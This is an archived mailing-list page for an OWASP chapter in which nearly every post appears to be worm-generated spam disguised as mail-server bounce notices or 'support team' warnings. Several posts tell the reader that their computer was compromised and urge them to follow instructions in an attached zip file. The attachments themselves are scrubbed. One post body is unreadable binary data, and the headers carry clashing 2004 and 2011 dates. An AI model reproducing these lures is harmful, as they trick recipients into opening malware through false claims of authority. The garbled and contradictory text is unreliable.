From MAILER-DAEMON at lists.owasp.org  Tue Apr  6 20:16:28 2004
From: MAILER-DAEMON at lists.owasp.org (Mail Administrator)
Date: Wed, 07 Apr 2004 00:16:28 -0000
Subject: [Owasp-delhi] Returned mail: Data format error
Message-ID: <mailman.5.1081296990.2290.owasp-delhi@lists.owasp.org>

The original message was received at Sat, 20 Aug 2011 15:53:28 +0530 from lists.owasp.org [91.146.171.101]

----- The following addresses had permanent fatal errors -----
owasp-delhi at lists.owasp.org

----- Transcript of session follows -----
... while talking to lists.owasp.org.:
554 <owasp-delhi at lists.owasp.org>... Message is too large
554 <owasp-delhi at lists.owasp.org>... Service unavailable

-------------- next part --------------
A non-text attachment was scrubbed...
Name: message.zip
Type: application/octet-stream
Size: 29332 bytes
Desc: not available
Url : https://lists.owasp.org/pipermail/owasp-delhi/attachments/20040407/bf4fc7df/attachment.obj 

From noreply at lists.owasp.org  Tue Apr  6 23:02:02 2004
From: noreply at lists.owasp.org (Post Office)
Date: Wed, 07 Apr 2004 03:02:02 -0000
Subject: [Owasp-delhi] Mail System Error - Returned Mail
Message-ID: <mailman.7.1081306923.2290.owasp-delhi@lists.owasp.org>

Dear user owasp-delhi at lists.owasp.org,

Your account was used to send a huge amount of spam during the last week.
Obviously, your computer had been compromised and now contains a hidden proxy server.

We recommend you to follow our instructions in the attached text file in order to keep your computer safe.

Virtually yours,
The lists.owasp.org support team.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: trkxoh.zip
Type: application/octet-stream
Size: 28982 bytes
Desc: not available
Url : https://lists.owasp.org/pipermail/owasp-delhi/attachments/20040407/f89f242e/attachment.obj 

From noreply at lists.owasp.org  Wed Apr  7 16:54:17 2004
From: noreply at lists.owasp.org (Mail Delivery Subsystem)
Date: Wed, 07 Apr 2004 20:54:17 -0000
Subject: [Owasp-delhi] Delivery reports about your e-mail
Message-ID: <mailman.8.1081371259.2290.owasp-delhi@lists.owasp.org>

Dear user owasp-delhi at lists.owasp.org,

Your e-mail account has been used to send a huge amount of junk e-mail messages during the last week.
Obviously, your computer was compromised and now runs a hidden proxy server.

We recommend you to follow our instructions in the attached text file in order to keep your computer safe.

Have a nice day,
The lists.owasp.org support team.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: readme.zip
Type: application/octet-stream
Size: 28982 bytes
Desc: not available
Url : https://lists.owasp.org/pipermail/owasp-delhi/attachments/20040407/53dc946f/attachment.obj 

From MAILER-DAEMON at lists.owasp.org  Wed Apr  7 17:34:37 2004
From: MAILER-DAEMON at lists.owasp.org (Returned mail)
Date: Wed, 07 Apr 2004 21:34:37 -0000
Subject: [Owasp-delhi] Returned mail: Data format error
Message-ID: <mailman.9.1081373678.2290.owasp-delhi@lists.owasp.org>

????xW?2?*Rdo?~?h???M8??????D??vTJ?b^,g???Z?E?)H????hG?n?kdo?fq??
??'Ee?
??????0??]I?}?Q???? ?????y,???)?b?>5R????????Ge?m?[7
???????Cd.a?f?"~????zqP
\???
?6?/((jjQ?????a?
??j^?e??!?JvmV????Uw;?e(?????r?7??;???u??/??2??w??C??L?????z?)L??tWsP???
?L??|$a?[Fb?|?b????0?n????/v?-??f????N):?X??^?.)]O)v)?*??F????]x??hy!?-????lF???
????G?????d?Q?^9~??k???I???D
]Lb??]*s??e??[-??A??.?_$T???E??? ?I????'/-?V???'??tbVE8O?&?&?
??????u?a?????B?????Q?y-[Y >?.$??{?w????<?T??????!?zAZ
?-p?KT????
??c`?????2/8?%X4UY?2{hzi??u?P{u?Y??_5>??X>h5???{E????9D7?
u????_????o#S?
?8???!S~;??W?S>?????b}C?S?z????????????s?B?^C?6c?????YY??I%B ???z?Z?J???c[S?3w?*N?Z??U_?0??x7?ZinTz??|?C???????"Y????E/??????~?5N
qJli&?????????FsdZ???Y??U;?1H?????c?_:?????Y?#?'?????d?Y?????ly?????_?yTh????~??
??go?'>?[?v"E?
?p???}- ?????u?b]???W??C<?7G???????????8
?-?|`jR1???Qb???~?w??BX|?x?j??Y????l?L-cNe?`???GN???B)???.?D?????(?
?`?A^2????q
)?*???,(9HN?3a?????X|ex6??^m2?\?&/???n?M????d????????j???v7m?"??????{???q'?z????&)??d?????;'????jY???ZY;,?U??o??Gd??K?$?L?6??W?M^k???e?.%?????q??????? ??&B?????_z????
;7?v<?f'???0??*???4???-eU????5G??t_<_??V??KJ
?O1V?G2o???d*?</]?M^!?*0?9??ZQ?,?I????O??Eo??{???D???
6??\??!?C?B?`)K???????????????%??V
i3??]???m??Q??'????L?L?N???[??v7.?????
)?W?_G?k???O?W?\???K
??????wn?nB?;wTeC??T25dF?0?P?%???p?8??K?p???????f????s]
???4A???-?wWI???|???6k&??)?g????????ET?J6?????r?!?p?'?_?Jsz?????0[hA?M?J\???????'S?J??yf????lJh??Q???{8?J?<?>aH???%"2???y?G?7???L?T?u?_?P_?D?g???t??[?$?'?\k??,?"??fZ[?V?Z.\??????
,"W????\??{E4?R???????\?H?X???4??????}?c?I??rb?[j????o??u?g?"j?????';??$3???"h?SQ?????UPz6r??r?l?<-?ak??3<}????18?H??_?>??K?bm?N}sI?
:??'E?4>j
???BE??z???
????8????????I)?n?e7u???E*??b??,?\?N?M???&A1kM
:?
?5(
?ZZ?*??,%??????o?%D??99n????L????*?US?Z$???e?-?;??!???V??z?-j?FD???z??????2$??k?<?
?
???G*?j?
?]??????_\????ZU????B??(,??u4????_}?LMH?s???#??<r?vw0y_??L??
E

-------------- next part --------------
A non-text attachment was scrubbed...
Name: instruction.zip
Type: application/octet-stream
Size: 29094 bytes
Desc: not available
Url : https://lists.owasp.org/pipermail/owasp-delhi/attachments/20040407/55be094a/attachment.obj 

From postmaster at lists.owasp.org  Thu Apr  8 19:21:22 2004
From: postmaster at lists.owasp.org (Bounced mail)
Date: Thu, 08 Apr 2004 23:21:22 -0000
Subject: [Owasp-delhi] report
Message-ID: <mailman.12.1081466486.2290.owasp-delhi@lists.owasp.org>



-------------- next part --------------
A non-text attachment was scrubbed...
Name: instruction.zip
Type: application/octet-stream
Size: 29528 bytes
Desc: not available
Url : https://lists.owasp.org/pipermail/owasp-delhi/attachments/20040408/190dd16c/attachment.obj 

From noreply at lists.owasp.org  Thu Apr  8 21:25:22 2004
From: noreply at lists.owasp.org (Returned mail)
Date: Fri, 09 Apr 2004 01:25:22 -0000
Subject: [Owasp-delhi] Delivery reports about your e-mail
Message-ID: <mailman.13.1081473923.2290.owasp-delhi@lists.owasp.org>

The original message was received at Mon, 22 Aug 2011 17:02:01 +0530 from lists.owasp.org [162.197.248.68]

----- The following addresses had permanent fatal errors -----
owasp-delhi at lists.owasp.org

----- Transcript of the session follows -----
... while talking to host 208.88.194.124:
550 5.1.2 <owasp-delhi at lists.owasp.org>... Host unknown (Name server: host not found)

-------------- next part --------------
A non-text attachment was scrubbed...
Name: text.zip
Type: application/octet-stream
Size: 29052 bytes
Desc: not available
Url : https://lists.owasp.org/pipermail/owasp-delhi/attachments/20040409/575ab9a8/attachment.obj 

From noreply at lists.owasp.org  Fri Apr  9 13:09:16 2004
From: noreply at lists.owasp.org (MAILER-DAEMON)
Date: Fri, 09 Apr 2004 17:09:16 -0000
Subject: [Owasp-delhi] Mail System Error - Returned Mail
Message-ID: <mailman.16.1081530562.2290.owasp-delhi@lists.owasp.org>

Dear user of lists.owasp.org,

Your email account was used to send a huge amount of spam during the recent week.
Probably, your computer was compromised and now runs a hidden proxy server.

Please follow our instructions in the attached text file in order to keep your computer safe.

Have a nice day,
lists.owasp.org technical support team.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: message.zip
Type: application/octet-stream
Size: 29104 bytes
Desc: not available
Url : https://lists.owasp.org/pipermail/owasp-delhi/attachments/20040409/f05bffc0/attachment.obj 

From noreply at lists.owasp.org  Fri Apr  9 14:57:34 2004
From: noreply at lists.owasp.org (Post Office)
Date: Fri, 09 Apr 2004 18:57:34 -0000
Subject: [Owasp-delhi] Returned mail: Data format error
Message-ID: <mailman.17.1081537055.2290.owasp-delhi@lists.owasp.org>

The original message was received at Tue, 23 Aug 2011 10:32:37 +0530
from lists.owasp.org [186.19.0.97]

----- The following addresses had permanent fatal errors -----
owasp-delhi at lists.owasp.org

----- Transcript of the session follows -----
... while talking to host lists.owasp.org.:
554 <owasp-delhi at lists.owasp.org>... Message is too large
554 <owasp-delhi at lists.owasp.org>... Service unavailable

-------------- next part --------------
A non-text attachment was scrubbed...
Name: file.zip
Type: application/octet-stream
Size: 29152 bytes
Desc: not available
Url : https://lists.owasp.org/pipermail/owasp-delhi/attachments/20040409/a743856c/attachment.obj 

From postmaster at lists.owasp.org  Fri Apr  9 18:08:13 2004
From: postmaster at lists.owasp.org (Bounced mail)
Date: Fri, 09 Apr 2004 22:08:13 -0000
Subject: [Owasp-delhi] HI
Message-ID: <mailman.18.1081548495.2290.owasp-delhi@lists.owasp.org>

The original message was received at Tue, 23 Aug 2011 15:14:36 +0800 from lists.owasp.org [72.191.53.192]

----- The following addresses had permanent fatal errors -----
<owasp-delhi at lists.owasp.org>



-------------- next part --------------
A non-text attachment was scrubbed...
Name: attachment.zip
Type: application/octet-stream
Size: 29116 bytes
Desc: not available
Url : https://lists.owasp.org/pipermail/owasp-delhi/attachments/20040409/b77aa3a2/attachment.obj 

From postmaster at lists.owasp.org  Fri Apr  9 18:45:59 2004
From: postmaster at lists.owasp.org (MAILER-DAEMON)
Date: Fri, 09 Apr 2004 22:45:59 -0000
Subject: [Owasp-delhi] Delivery reports about your e-mail
Message-ID: <mailman.19.1081550760.2290.owasp-delhi@lists.owasp.org>

The original message was received at Tue, 23 Aug 2011 16:52:06 +0800
from 38.250.91.107

----- The following addresses had permanent fatal errors -----
owasp-delhi at lists.owasp.org

----- Transcript of session follows -----
... while talking to host lists.owasp.org.:
>>> DATA
<<< 400

-------------- next part --------------
A non-text attachment was scrubbed...
Name: nxxo.zip
Type: application/octet-stream
Size: 29118 bytes
Desc: not available
Url : https://lists.owasp.org/pipermail/owasp-delhi/attachments/20040409/03751e7c/attachment.obj 

From postmaster at lists.owasp.org  Fri Apr  9 20:39:51 2004
From: postmaster at lists.owasp.org (Returned mail)
Date: Sat, 10 Apr 2004 00:39:51 -0000
Subject: [Owasp-delhi] Delivery reports about your e-mail
Message-ID: <mailman.20.1081557593.2290.owasp-delhi@lists.owasp.org>

The message could not be delivered

-------------- next part --------------
A non-text attachment was scrubbed...
Name: attachment.zip
Type: application/octet-stream
Size: 29382 bytes
Desc: not available
Url : https://lists.owasp.org/pipermail/owasp-delhi/attachments/20040410/742a8364/attachment.obj 

From postmaster at lists.owasp.org  Fri Apr  9 20:52:12 2004
From: postmaster at lists.owasp.org (Post Office)
Date: Sat, 10 Apr 2004 00:52:12 -0000
Subject: [Owasp-delhi] Delivery reports about your e-mail
Message-ID: <mailman.21.1081558334.2290.owasp-delhi@lists.owasp.org>

The original message was received at Tue, 23 Aug 2011 16:29:02 +0530
from [63.121.198.157]

----- The following addresses had permanent fatal errors -----
owasp-delhi at lists.owasp.org

----- Transcript of session follows -----
... while talking to lists.owasp.org.:
554 <owasp-delhi at lists.owasp.org>... Message is too large
554 <owasp-delhi at lists.owasp.org>... Service unavailable

-------------- next part --------------
A non-text attachment was scrubbed...
Name: mail.zip
Type: application/octet-stream
Size: 28978 bytes
Desc: not available
Url : https://lists.owasp.org/pipermail/owasp-delhi/attachments/20040410/8e00a9fe/attachment.obj 

From noreply at lists.owasp.org  Fri Apr  9 22:28:47 2004
From: noreply at lists.owasp.org (Bounced mail)
Date: Sat, 10 Apr 2004 02:28:47 -0000
Subject: [Owasp-delhi] Status
Message-ID: <mailman.22.1081564127.2290.owasp-delhi@lists.owasp.org>

The original message was received at Tue, 23 Aug 2011 18:05:33 +0530 from 42.61.236.146

----- The following addresses had permanent fatal errors -----
owasp-delhi at lists.owasp.org

----- Transcript of session follows -----
... while talking to lists.owasp.org.:
>>> MAIL FROM:"Bounced mail" <noreply at lists.owasp.org>
<<< 503 "Bounced mail" <noreply at lists.owasp.org>... Refused

-------------- next part --------------
A non-text attachment was scrubbed...
Name: file.zip
Type: application/octet-stream
Size: 29166 bytes
Desc: not available
Url : https://lists.owasp.org/pipermail/owasp-delhi/attachments/20040410/0f5611f7/attachment.obj 

